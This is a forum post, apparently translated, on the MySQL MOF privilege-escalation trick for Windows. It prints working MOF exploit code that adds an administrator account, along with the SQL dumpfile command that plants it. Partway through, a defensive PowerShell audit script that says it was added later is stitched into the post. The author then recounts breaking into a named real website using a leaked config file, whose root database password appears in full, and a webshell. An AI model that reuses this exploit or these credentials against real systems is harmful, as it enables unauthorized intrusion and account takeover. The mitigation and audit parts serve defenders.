Methods for preventing the MySQL MOF extension vulnerability

Some exploit code published online:

#pragma namespace("\\\\.\\root\\subscription");

// Filter: fires on every clock tick whose Second field equals 5
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

// Consumer: JScript that runs a command through WScript.Shell
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};

// Binding: wires the filter to the consumer so the script runs when the filter fires
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
After connecting to the MySQL database, execute:

select load_file('C:\\RECYCLER\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

From the code above, the solutions follow:

1. MySQL user privilege control: forbid functions such as load_file and dumpfile

2. Disable the WScript.Shell component

3. Directory permissions: remove the built-in special group CREATOR OWNER from c:/windows/system32/wbem/mof/
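The following audit script is an added example for this page and is not part of the original post or of any tool it mentions. It checks a Windows host for the objects the MOF above registers in root\subscription (mitigation 2's concern, a script consumer driving WScript.Shell) and for the directory ACL that mitigation 3 addresses. The regular expression of suspicious script fragments, the list of "broad" groups and the report layout are assumptions made for this example.

```powershell
# Added example (not from the original post): read-only audit for the
# artefacts the MOF above leaves behind and for the ACL weakness of mitigation 3.
# Run from an elevated Windows PowerShell session.
# The $suspicious pattern and the group names below are this example's own
# assumptions, not anything the post specifies.

$ns     = 'root\subscription'
$mofDir = Join-Path $env:SystemRoot 'System32\wbem\mof'

# Script bodies that typically indicate a dropped-in consumer; the MOF on this
# page matches on both "WScript.Shell" and "net.exe user".
$suspicious = 'WScript\.Shell|net(\.exe)?\s+user|cmd(\.exe)?\s|powershell'

# The MOF registers three objects: an __EventFilter (fires when the clock's
# Second field equals 5), an ActiveScriptEventConsumer (JScript that runs a
# command) and a __FilterToConsumerBinding that wires the two together.
function Get-ScriptConsumerReport {
    $consumers = @(Get-WmiObject -Namespace $ns -Class ActiveScriptEventConsumer -ErrorAction SilentlyContinue)
    foreach ($c in $consumers) {
        [pscustomobject]@{
            Name       = $c.Name
            Engine     = $c.ScriptingEngine
            Suspicious = [bool]($c.ScriptText -match $suspicious)
            ScriptText = $c.ScriptText
        }
    }
}

function Get-BindingReport {
    $filters  = @(Get-WmiObject -Namespace $ns -Class __EventFilter -ErrorAction SilentlyContinue)
    $bindings = @(Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding -ErrorAction SilentlyContinue)
    foreach ($b in $bindings) {
        # Filter and Consumer are object paths such as __EventFilter.Name="filtP2";
        # pull the Name out so the filter's WQL query can be shown next to it.
        $filterName = $b.Filter -replace '^.*Name="([^"]+)".*$', '$1'
        $filter     = $filters | Where-Object { $_.Name -eq $filterName } | Select-Object -First 1
        [pscustomobject]@{
            Filter   = $b.Filter
            Query    = $filter.Query
            Consumer = $b.Consumer
        }
    }
}

# Windows XP/2003 compiled any .mof dropped into this directory. Mitigation 3
# removes CREATOR OWNER, the inheritable placeholder ACE that grants whoever
# creates a file here rights over it. Report that entry and any broad group
# holding write-capable rights.
function Get-MofDirWriteAces {
    if (-not (Test-Path $mofDir)) { return }
    (Get-Acl -Path $mofDir).Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $_.FileSystemRights.ToString() -match 'Write|Modify|FullControl' -and
            ($_.IdentityReference -like '*CREATOR OWNER' -or
             $_.IdentityReference -like '*\Users' -or
             $_.IdentityReference -like '*Everyone')
        } |
        Select-Object IdentityReference, FileSystemRights, IsInherited
}

"== Script consumers in $ns =="
Get-ScriptConsumerReport | Format-List
"== Filter -> consumer bindings =="
Get-BindingReport | Format-Table -AutoSize
"== Write-capable ACEs on $mofDir =="
Get-MofDirWriteAces | Format-Table -AutoSize

# Remediation, once an entry is confirmed rogue: remove the binding first, then
# the consumer and the filter. Preview with -WhatIf before deleting, e.g.
#   Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
#       Where-Object { $_.Consumer -like '*consPCSV2*' } | Remove-WmiObject -WhatIf
```

The subscription check applies to any Windows version, because a persisted filter-to-consumer binding survives reboots wherever WMI runs; the directory check only matters on releases that still auto-compile dropped MOF files, which is why the function returns nothing when the directory is absent. Mitigation 1 lives on the MySQL side: the dumpfile query on this page needs the global FILE privilege (REVOKE FILE ON *.* FROM the web application's account), and a secure_file_priv setting confines or, on 5.7 and later with an empty string, disables LOAD_FILE and INTO DUMPFILE entirely. The write into System32 also depends on mysqld running with rights to that path, which a Windows service installed under LocalSystem has; running it under a dedicated low-privileged account removes that.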
Of course, the above is what people say online. I feel the privileges it needs are quite high, e.g. root plus MySQL remote access. I ran into one yesterday, so let me demonstrate it for everyone.

Here is how it happened: a buddy asked a question on the forum, I took a look and found that an expert had already taken it down, saying it was done with MySQL MOF extension privilege escalation.

But this newbie had never heard of it, so I quickly went to look up material and study it... which is where the content above, taken from the web, comes from.

Once I understood it, time to practice.

http://www.webbmw.com/config/config_ucenter.php one-liner webshell:

$_config['db']['1']['dbhost'] = 'localhost';
$_config['db']['1']['dbuser'] = 'root';
$_config['db']['1']['dbpw'] = 'tfr226206';
$_config['db']['1']['dbcharset'] = 'gbk';
$_config['db']['1']['pconnect'] = '0';
$_config['db']['1']['dbname'] = 'webbmw';
$_config['db']['1']['tablepre'] = 'pre_';
$_config['db']['common']['slave_except_table'] = '';

There's the root password.

So I went straight at it with Caidao (菜刀).

Upload the shell first.

Since we have those accounts and so on, let's execute it.......

A small note:

Here the first execution did not succeed; reason unknown.

I guessed it might be because the code we executed had a problem, so I went to fetch the code I found on WooYun.
#pragma namespace("\\\\.\\root\\subscription")

// Filter: fires on every clock tick whose Second field equals 5
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

// Consumer: JScript that runs a command through WScript.Shell
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user test test /add\")";
};

// Binding: wires the filter to the consumer
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};

I put the file at C:\WINDOWS\temp\1.mof

So we modify the code to execute:

-- backslashes doubled: MySQL treats a single \ inside a string literal as an escape
select load_file('C:\\WINDOWS\\temp\\1.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

But you will find the account still isn't sitting there..

That was annoying.

So I went through them one by one, and when I got to the second one, mysql, it succeeded.........

But none of the other databases worked...

I'm really puzzled. Why exactly did it not succeed? Looking for an expert to explain...